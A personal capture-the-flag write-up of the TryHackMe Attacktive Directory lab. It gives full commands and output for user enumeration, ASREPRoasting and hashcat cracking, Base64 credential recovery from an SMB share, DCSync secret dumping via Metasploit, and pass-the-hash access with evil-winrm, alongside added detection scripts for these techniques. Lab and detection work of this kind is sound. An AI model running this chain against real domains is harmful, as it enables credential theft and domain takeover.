Attacktive Directory
These notes are from a challenge I did @tryhackme called attacktivedirectory.
Prepare
Install Impacket, kerbrute, evil-winrm, Bloodhound and Neo4j:
sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
sudo pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/ && sudo python3 ./setup.py install
sudo apt install bloodhound neo4j
go get github.com/ropnop/kerbrute
gem install evil-winrm
sudo apt update && sudo apt upgrade
Scan
Scan target with nmap -sC -sV 10.10.12.33
Nmap scan report for 10.10.12.33
Host is up (0.021s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-08-19 19:17:25Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2021-08-19T19:17:27+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2021-08-18T18:37:51
|_Not valid after: 2022-02-17T18:37:51
|_ssl-date: 2021-08-19T19:17:35+00:00; 0s from scanner time.
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-08-19T19:17:29
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.37 seconds
Enumerating Users via Kerberos
Enumerate port 139/445 with enum4linux -U -o 10.10.12.33
Starting enum4linux v0.8.9 ( labs.portcullis.co.uk/application/enum4linux/ ) on Thu Aug 19 15:24:22 2021
==========================
| Target Information |
==========================
Target ........... 10.10.12.33
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===================================================
| Enumerating Workgroup/Domain on 10.10.12.33 |
===================================================
[E] Can't find workgroup/domain
====================================
| Session Check on 10.10.12.33 |
====================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.12.33 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:
==========================================
| Getting domain SID for 10.10.12.33 |
==========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)
=====================================
| OS information on 10.10.12.33 |
=====================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.12.33 from smbclient:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for 10.10.12.33 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
============================
| Users on 10.10.12.33 |
============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
enum4linux complete on Thu Aug 19 15:24:34 2021
Abusing Kerberos
ASREPRoasting with kerbrute and the provided userlist: ./kerbrute -domain spookysec.local -dc-ip 10.10.12.33 -users ~/userlist.txt
Impacket v0.9.24.dev1+20210814.5640.358fc7c6 - Copyright 2021 SecureAuth Corporation
[*] Valid user => james
[*] Valid user => svc-admin [NOT PREAUTH]
[*] Valid user => James
[*] Valid user => robin
[*] Blocked/Disabled user => guest
[*] Valid user => darkstar
[*] Valid user => administrator
[*] Valid user => backup
[*] Valid user => paradox
[*] Valid user => JAMES
[*] Valid user => Robin
[*] Blocked/Disabled user => Guest
[*] Valid user => Administrator
[*] Valid user => Darkstar
[*] Valid user => Paradox
[*] Valid user => DARKSTAR
[*] Valid user => ori
[*] Valid user => ROBIN
[*] Blocked/Disabled user => GUEST
[*] No passwords were discovered :'(
GetNPUsers.py spookysec.local/svc-admin -no-pass -dc-ip 10.10.12.33
Impacket v0.9.24.dev1+20210814.5640.358fc7c6 - Copyright 2021 SecureAuth Corporation
[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:fea34e6cdca777efe84cbdeaa48d35b9$cf364f98148fce49cc67dd350754a9c9ccf20dd516b1c2c6aecb6984aba91fca5b386b4ba7b59434f54440ecccdd549533157318a55752abe941976eae78132f61832fba98bc391ee52c51e924cd8d091b6e6d854bc16e769184867024f195936687839c4e63cf54f7a2e1749020c279e3b08f78826ca90deffcda9bdd721a87166fa6e9fe6f68cd493751df05b2ae92a0e5e466f8c674bf16c346e9ee9714f7098369d90dad8e5bac5b4ac316e94ff65acd8914a356450be18b671db831031c6a709369d586d704bc827f2221f3edfd60e5f675fb6ac97570e20bd094362e354b63279e757486c82162d6ae04467d7c1261
We received a Kerberos ticket (Kerberos 5 AS-REP etype 23, mode 18200), which we can crack using hashcat and the provided password list: hashcat -a 0 -m 18200 ~/example.hash ~/passwordlist.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Xeon(R) Platinum 8171M CPU @ 2.60GHz, 13896/13960 MB (4096 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 134 MB
Dictionary cache built:
* Filename..: /home/fab1/passwordlist.txt
* Passwords.: 70188
* Bytes.....: 569236
* Keyspace..: 70188
* Runtime...: 0 secs
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:fea34e6cdca777efe84cbdeaa48d35b9$cf364f98148fce49cc67dd350754a9c9ccf20dd516b1c2c6aecb6984aba91fca5b386b4ba7b59434f54440ecccdd549533157318a55752abe941976eae78132f61832fba98bc391ee52c51e924cd8d091b6e6d854bc16e769184867024f195936687839c4e63cf54f7a2e1749020c279e3b08f78826ca90deffcda9bdd721a87166fa6e9fe6f68cd493751df05b2ae92a0e5e466f8c674bf16c346e9ee9714f7098369d90dad8e5bac5b4ac316e94ff65acd8914a356450be18b671db831031c6a709369d586d704bc827f2221f3edfd60e5f675fb6ac97570e20bd094362e354b63279e757486c82162d6ae04467d7c1261:management2005
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:fea34e6cdca...7c1261
Guess.Base.......: File (/home/fab1/passwordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 158.0 kH/s (10.67ms) @ Accel:64 Loops:1 Thr:64 Vec:16
Recovered........: 1/1 (100.00%) Digests
Progress.........: 16384/70188 (23.34%)
Rejected.........: 0/16384 (0.00%)
Restore.Point....: 0/70188 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: m123456 -> cowgirlup
Started: 15:44:40
Stopped: 15:45:18
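Seen from the domain controller, the username guessing and the pre-auth-less request for svc-admin above both surface in Security event 4768. The detection logic below is an added example, not part of the original notes; the records are constructed, and the dict layout (EventData field names as keys), the 10.10.12.50 address and the name analyze_4768 are assumptions.

```python
from collections import defaultdict

RC4_HMAC = "0x17"           # etype 23, as in the $krb5asrep$23$ hash above
PRINCIPAL_UNKNOWN = "0x6"   # KDC_ERR_C_PRINCIPAL_UNKNOWN

# Constructed 4768 records (assumed export: EventData fields as dict keys).
EVENTS = [
    {"TargetUserName": "svc-admin", "Status": "0x0", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.9.193.173"},
    {"TargetUserName": "james", "Status": "0x0", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.12.50"},
] + [
    {"TargetUserName": name, "Status": "0x6", "PreAuthType": "-",
     "TicketEncryptionType": "0xffffffff", "IpAddress": "::ffff:10.9.193.173"}
    for name in ("alice", "Alice", "bob", "carol", "dave", "erin", "frank")
]


def analyze_4768(events, enum_threshold=5):
    """Return (TGTs issued without pre-auth, sources guessing many usernames)."""
    no_preauth = []
    unknown_by_ip = defaultdict(set)
    for ev in events:
        ip = ev.get("IpAddress", "").replace("::ffff:", "")
        user = ev.get("TargetUserName", "")
        status = ev.get("Status", "").lower()
        if status == "0x0" and ev.get("PreAuthType") == "0":
            # The AS-REP was issued without proof of the password, so its
            # encrypted part can be attacked offline; RC4 is the weakest case.
            etype = ev.get("TicketEncryptionType", "").lower()
            no_preauth.append({"user": user, "ip": ip, "rc4": etype == RC4_HMAC})
        elif status == PRINCIPAL_UNKNOWN:
            # Fold case so james/James/JAMES-style variants count once.
            unknown_by_ip[ip].add(user.lower())
    enumeration = {ip: sorted(names) for ip, names in unknown_by_ip.items()
                   if len(names) >= enum_threshold}
    return no_preauth, enumeration


if __name__ == "__main__":
    hits, sources = analyze_4768(EVENTS)
    for hit in hits:
        print("no pre-auth TGT:", hit)
    for ip, names in sources.items():
        print(f"possible enumeration from {ip}: {len(names)} unknown names")
```

The lasting fix for a flagged account is to clear "Do not require Kerberos preauthentication" and give it a password that is not in any wordlist.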
Back to the Basics
Let's enumerate any shares that the domain controller may be giving out with smbclient: smbclient -L \\\\10.10.12.33 -U svc-admin@spookysec.local
Enter svc-admin@spookysec.local's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
Backup seems like an interesting share. Let's view its contents: smbclient \\\\10.10.12.33\\backup -U svc-admin@spookysec.local
Enter svc-admin@spookysec.local's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Apr 4 15:08:39 2020
.. D 0 Sat Apr 4 15:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 15:08:53 2020
8247551 blocks of size 4096. 3636330 blocks available
smb: \> more backup_credentials.txt
backup_credentials.txt contains what looks like some kind of hash, which we can try to identify, e.g. with decodify: dcode YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
[+] Decoded from Base64 : backup@spookysec.local:backup2517860
Elevating Privileges within the Domain
Now that we know this is Base64 we can run this command to read the content: echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d
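Base64 is an encoding, not protection, so a file like this is a plaintext credential to anyone who can read the share. The share audit below is an added example, not part of the original notes; the function name, the patterns and the first sample line are assumptions, and the second sample line is the file content shown above.

```python
import base64
import binascii
import re

# Candidate Base64 runs of at least 16 characters, not embedded in a longer run.
B64_RE = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")
# Decoded shape we care about: user@domain.tld:secret
CRED_RE = re.compile(r"^[\w.-]+@[\w.-]+\.[A-Za-z]{2,}:\S+$")

# Line 1 is a constructed benign token; line 2 is the string from this page.
SAMPLE = (
    "notes: aGVsbG8gd29ybGQgdGhpcyBpcyBmaW5l\n"
    "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw\n"
)


def find_encoded_credentials(text):
    """Return (line number, account, secret length) for Base64 that decodes to a credential."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for match in B64_RE.finditer(line):
            token = match.group(0)
            if len(token) % 4:
                continue  # not a whole number of Base64 quanta
            try:
                decoded = base64.b64decode(token, validate=True).decode("ascii")
            except (binascii.Error, UnicodeDecodeError):
                continue  # random-looking text or binary data, not a credential
            if CRED_RE.match(decoded):
                account, _, secret = decoded.partition(":")
                # Report only the length so the audit log does not leak the secret.
                findings.append((lineno, account, len(secret)))
    return findings


if __name__ == "__main__":
    for lineno, account, length in find_encoded_credentials(SAMPLE):
        print(f"line {lineno}: encoded credential for {account} ({length} chars)")
```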
Running secretsdump.py didn't work for me e.g.: secretsdump.py spookysec.local/backup:backup2517860@10.10.12.33 -use-vss
So I used Metasploit with secretsdump.py and set lhost, SMBDomain, RHOSTS, SMBPass and SMBUser accordingly: msfconsole
=[ metasploit v6.1.0-dev ]
+ -- --=[ 2157 exploits - 1146 auxiliary - 367 post ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: View all productivity tips with the
tips command
msf6 > search secretsdump
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/smb/impacket/secretsdump normal No DCOM Exec
1 post/windows/gather/credentials/windows_sam_hivenightmare 2021-07-20 normal No Windows SAM secrets leak - HiveNightmare
2 auxiliary/gather/windows_secrets_dump normal No Windows Secrets Dump
Interact with a module by name or index. For example info 2, use 2 or use auxiliary/gather/windows_secrets_dump
msf6 > use auxiliary/scanner/smb/impacket/secretsdump
msf6 auxiliary(scanner/smb/impacket/secretsdump) > set lhost 10.9.193.173
lhost => 10.9.193.173
msf6 auxiliary(scanner/smb/impacket/secretsdump) > set SMBDomain spookysec.local
SMBDomain => spookysec.local
msf6 auxiliary(scanner/smb/impacket/secretsdump) > set RHOSTS 10.10.12.33
RHOSTS => 10.10.12.33
msf6 auxiliary(scanner/smb/impacket/secretsdump) > set SMBPass backup2517860
SMBPass => backup2517860
msf6 auxiliary(scanner/smb/impacket/secretsdump) > set SMBUser backup
SMBUser => backup
msf6 auxiliary(scanner/smb/impacket/secretsdump) > exploit
[*] Running for 10.10.12.33...
[-] 10.10.12.33 - RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] 10.10.12.33 - Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] 10.10.12.33 - Using the DRSUAPI method to get NTDS.DIT secrets
[*] 10.10.12.33 - Kerberos keys grabbed
[*] 10.10.12.33 - Cleaning up...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
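The dump above works because the backup account is allowed to request directory replication over DRSUAPI, which a domain controller records as Security event 4662 carrying the replication control-access GUIDs. The detection logic below is an added example, not part of the original notes; it assumes 4662 auditing is enabled and collected, and the records, the dict layout and the name find_dcsync are constructed for illustration.

```python
import re

# Control-access rights that together allow pulling password data by replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")

# Constructed 4662 records (assumed export: EventData fields as dict keys).
EVENTS = [
    {"SubjectUserName": "ATTACKTIVEDIREC$", "SubjectDomainName": "THM-AD",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "backup", "SubjectDomainName": "THM-AD",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "backup", "SubjectDomainName": "THM-AD",
     "Properties": "{1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"},
    {"SubjectUserName": "svc-admin", "SubjectDomainName": "THM-AD",
     "Properties": "{00000000-0000-0000-0000-000000000000}"},  # placeholder GUID
]


def find_dcsync(events, domain_controllers):
    """Map each non-DC account to the replication rights it exercised."""
    allowed = {name.lower() for name in domain_controllers}
    findings = {}
    for ev in events:
        account = ev.get("SubjectUserName", "")
        if account.lower() in allowed:
            continue  # replication between domain controllers is expected
        guids = (g.lower() for g in GUID_RE.findall(ev.get("Properties", "")))
        rights = {REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS}
        if rights:
            findings.setdefault(account, set()).update(rights)
    return {account: sorted(rights) for account, rights in findings.items()}


if __name__ == "__main__":
    for account, rights in find_dcsync(EVENTS, ["ATTACKTIVEDIREC$"]).items():
        print(f"replication requested by non-DC account {account}: {', '.join(rights)}")
```

An account that appears here should lose the replication rights on the domain object unless it is a documented synchronisation service.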
Secretsdump.py uses the DRSUAPI method to get NTDS.DIT secrets. We can feed evil-winrm with the hash of the administrator to gain access using this command: evil-winrm -i 10.10.12.33 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
Evil-WinRM shell v3.2
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> more root.txt
*Evil-WinRM* PS C:\Users\backup\Desktop> more PrivEsc.txt
*Evil-WinRM* PS C:\Users\svc-admin\Desktop> more user.txt.txt
Whoop Whoop, now we have the flags for Administrator, backup and svc-admin ^^